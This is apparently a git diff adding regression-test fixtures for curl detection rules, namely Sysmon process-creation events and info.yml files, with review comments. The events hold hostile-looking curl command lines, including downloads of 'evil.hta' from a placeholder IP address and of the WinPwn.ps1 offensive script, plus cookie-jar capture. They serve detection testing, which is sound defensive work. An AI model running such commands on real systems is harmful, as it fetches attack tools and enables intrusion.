diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx
new file mode 100755
index 000000000..e5eb3a054
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json
new file mode 100644
index 000000000..af8f74405
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:22:12.568940Z"
+ }
+ },
+ "EventRecordID": 21497,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:22:12.498",
+ "ProcessGuid": "0197231E-6314-693A-D112-000000000800",
+ "ProcessId": 11000,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl.exe --cookie-jar cookie \"http://example.com\"",
+ "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
+ "LogonId": "0x3144c",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "High",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
+ "ParentProcessId": 3476,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
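Review bot: This fixture commits the author's real workstation and account names into the corpus (`"Computer": "swachchhanda"`, `"User": "swachchhanda\\xodih"`, and a `CurrentDirectory` under `C:\Users\xodih\`), and the paired `.evtx` presumably carries the same strings. The rule this fixture exercises, as far as it is visible in this commit, keys only on `Image`/`OriginalFileName` and `CommandLine`, so these fields could be normalised to generic values (e.g. `"Computer": "WIN-TEST"`, `"User": "WIN-TEST\\tester"`) without weakening the regression test; `Hashes`, `OriginalFileName` and `CommandLine` are the values worth keeping byte-exact. The same observation applies to the other seven fixtures added by this commit.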
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
new file mode 100644
index 000000000..c5dda047b
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/info.yml
@@ -0,0 +1,13 @@
+id: d7f159c3-db76-4e39-b677-c0958f5f82b8
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 5a6e1e16-07de-48d8-8aae-faa766c05e88
+ title: Potential Cookies Session Hijacking
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_cookie_hijacking/5a6e1e16-07de-48d8-8aae-faa766c05e88.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx
new file mode 100755
index 000000000..67be7e022
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json
new file mode 100644
index 000000000..aea2fe730
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.json
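Review bot: `description: N/A` is a placeholder in this `info.yml` (and in the seven sibling files added by this commit); a one-line statement of the captured scenario is what lets a maintainer judge whether a later rule change legitimately drops the match. For this fixture the paired event supports `description: curl.exe started from an interactive cmd.exe with --cookie-jar, writing a cookie jar to the working directory`. Every `regression_tests_info` block here also lists only a `Positive Detection Test`; a negative fixture per rule (a benign curl invocation that must not match) would catch over-broadening, which is the failure mode a command-line rule is most prone to.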
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:17:19.772545Z"
+ }
+ },
+ "EventRecordID": 21475,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:17:19.636",
+ "ProcessGuid": "0197231E-61EF-693A-C812-000000000800",
+ "ProcessId": 6400,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl.exe -H \"User-Agent: EvilAgent\" http://example.com",
+ "CurrentDirectory": "C:\\Users\\xodih\\Downloads\\Sysmon\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-4C14-030000000000",
+ "LogonId": "0x3144c",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "High",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-BDEA-6937-AB0C-000000000800",
+ "ParentProcessId": 3476,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
new file mode 100644
index 000000000..f8c2ccdc5
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/info.yml
@@ -0,0 +1,13 @@
+id: 6428e458-fe2e-4936-accb-aebd0bcc8e35
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 85de1f22-d189-44e4-8239-dc276b45379b
+ title: Curl Web Request With Potential Custom User-Agent
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_custom_user_agent/85de1f22-d189-44e4-8239-dc276b45379b.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx
new file mode 100644
index 000000000..fd2796fb2
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json
new file mode 100644
index 000000000..b33823434
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T07:02:39.732592Z"
+ }
+ },
+ "EventRecordID": 21767,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 07:02:39.718",
+ "ProcessGuid": "0197231E-6C8F-693A-2613-000000000800",
+ "ProcessId": 17752,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --output hello.txt https://12.34.56.78/hack/evil.txt",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
new file mode 100644
index 000000000..73c9feaf9
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/info.yml
@@ -0,0 +1,13 @@
+id: 6aac357c-fe1d-4ca0-82e2-df626f71e838
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 9cc85849-3b02-4cb5-b371-3a1ff54f2218
+ title: File Download From IP URL Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec/9cc85849-3b02-4cb5-b371-3a1ff54f2218.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx
new file mode 100755
index 000000000..09038101d
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json
new file mode 100644
index 000000000..e4493b612
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:34:20.042883Z"
+ }
+ },
+ "EventRecordID": 21588,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:34:19.983",
+ "ProcessGuid": "0197231E-65EB-693A-F112-000000000800",
+ "ProcessId": 14440,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --output benign.hta \"https://12.34.56.78/hack/evil.hta\"",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
new file mode 100644
index 000000000..2b8c8c48d
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/info.yml
@@ -0,0 +1,13 @@
+id: 0f1b33fc-f97e-4469-a9ec-32ffb436f490
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 5cb299fc-5fb1-4d07-b989-0644c68b6043
+ title: Suspicious File Download From IP Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_susp_extensions/5cb299fc-5fb1-4d07-b989-0644c68b6043.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx
new file mode 100755
index 000000000..bd24a3fd7
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json
new file mode 100644
index 000000000..febe17014
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.json 
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:41:38.130858Z"
+ }
+ },
+ "EventRecordID": 21642,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:41:38.096",
+ "ProcessGuid": "0197231E-67A2-693A-FF12-000000000800",
+ "ProcessId": 9656,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl -O \"https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1\"",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
new file mode 100644
index 000000000..56af37248
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/info.yml
@@ -0,0 +1,13 @@
+id: 68e8f5c3-5a3b-4878-82d3-24d961eb219b
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: 56454143-524f-49fb-b1c6-3fb8b1ad41fb
+ title: Suspicious File Download From File Sharing Domain Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_download_susp_file_sharing_domains/56454143-524f-49fb-b1c6-3fb8b1ad41fb.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx
new file mode 100755
index 000000000..7ec40b988
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json
new file mode 100644
index 000000000..9b6dad729
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:43:20.070938Z"
+ }
+ },
+ "EventRecordID": 21651,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:43:20.052",
+ "ProcessGuid": "0197231E-6808-693A-0413-000000000800",
+ "ProcessId": 17792,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --insecure http://example.com",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
new file mode 100644
index 000000000..1fbe99a15
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/info.yml
@@ -0,0 +1,13 @@
+id: ef93f624-2b41-41ee-9596-298d3158acfb
+description: N/A
+date: 2025-12-11
+author: Swachchhanda Shrawan Poudel (Nextron Systems)
+rule_metadata:
+ - id: cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec
+ title: Insecure Transfer Via Curl.EXE
+regression_tests_info:
+ - name: Positive Detection Test
+ type: evtx
+ provider: Microsoft-Windows-Sysmon
+ match_count: 1
+ path: regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_connection/cb9cc1d1-e84e-4bdc-b7ad-c31b1b7908ec.evtx
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx
new file mode 100755
index 000000000..90ebbbd66
Binary files /dev/null and b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.evtx differ
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json
new file mode 100644
index 000000000..69e332233
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/2c1486f5-02e8-4f86-9099-b97f2da4ed77.json
@@ -0,0 +1,66 @@
+{
+ "Event": {
+ "#attributes": {
+ "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event"
+ },
+ "System": {
+ "Provider": {
+ "#attributes": {
+ "Name": "Microsoft-Windows-Sysmon",
+ "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9"
+ }
+ },
+ "EventID": 1,
+ "Version": 5,
+ "Level": 4,
+ "Task": 1,
+ "Opcode": 0,
+ "Keywords": "0x8000000000000000",
+ "TimeCreated": {
+ "#attributes": {
+ "SystemTime": "2025-12-11T06:45:56.284330Z"
+ }
+ },
+ "EventRecordID": 21680,
+ "Correlation": null,
+ "Execution": {
+ "#attributes": {
+ "ProcessID": 3208,
+ "ThreadID": 1724
+ }
+ },
+ "Channel": "Microsoft-Windows-Sysmon/Operational",
+ "Computer": "swachchhanda",
+ "Security": {
+ "#attributes": {
+ "UserID": "S-1-5-18"
+ }
+ }
+ },
+ "EventData": {
+ "RuleName": "-",
+ "UtcTime": "2025-12-11 06:45:56.239",
+ "ProcessGuid": "0197231E-68A4-693A-0713-000000000800",
+ "ProcessId": 13700,
+ "Image": "C:\\Windows\\System32\\curl.exe",
+ "FileVersion": "8.10.1",
+ "Description": "The curl executable",
+ "Product": "The curl executable",
+ "Company": "curl, https://curl.se/",
+ "OriginalFileName": "curl.exe",
+ "CommandLine": "curl --proxy-insecure -p -x http://127.0.0.1:1234 --silent -v --show-error http://127.0.0.1:888/echo",
+ "CurrentDirectory": "C:\\Users\\xodih\\AppData\\Local\\Temp\\",
+ "User": "swachchhanda\\xodih",
+ "LogonGuid": "0197231E-AB9F-67AA-FB17-030000000000",
+ "LogonId": "0x317fb",
+ "TerminalSessionId": 1,
+ "IntegrityLevel": "Medium",
+ "Hashes": "MD5=DBB2D090D2098B2B995FA067FDEF839F,SHA256=8955D2A45404A59C2E3772F3C76AEEAE48AEDF100BE328C003D7A4DF5342B491,IMPHASH=213443B550A6683661EB0CF00CF04681",
+ "ParentProcessGuid": "0197231E-F570-6938-8A10-000000000800",
+ "ParentProcessId": 14736,
+ "ParentImage": "C:\\Windows\\System32\\cmd.exe",
+ "ParentCommandLine": "\"C:\\WINDOWS\\system32\\cmd.exe\"",
+ "ParentUser": "swachchhanda\\xodih"
+ }
+ }
+}
diff --git a/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
new file mode 100644
index 000000000..9014d90aa
--- /dev/null
+++ b/regression_data/rules/windows/process_creation/proc_creation_win_curl_insecure_proxy_or_doh/info.yml
@@ -0,0 +1,13 @@
+id: 11dd9a12-467e-4c13-b928-7c3aea60f59f
+description: N/A
+date: 2025-12-11
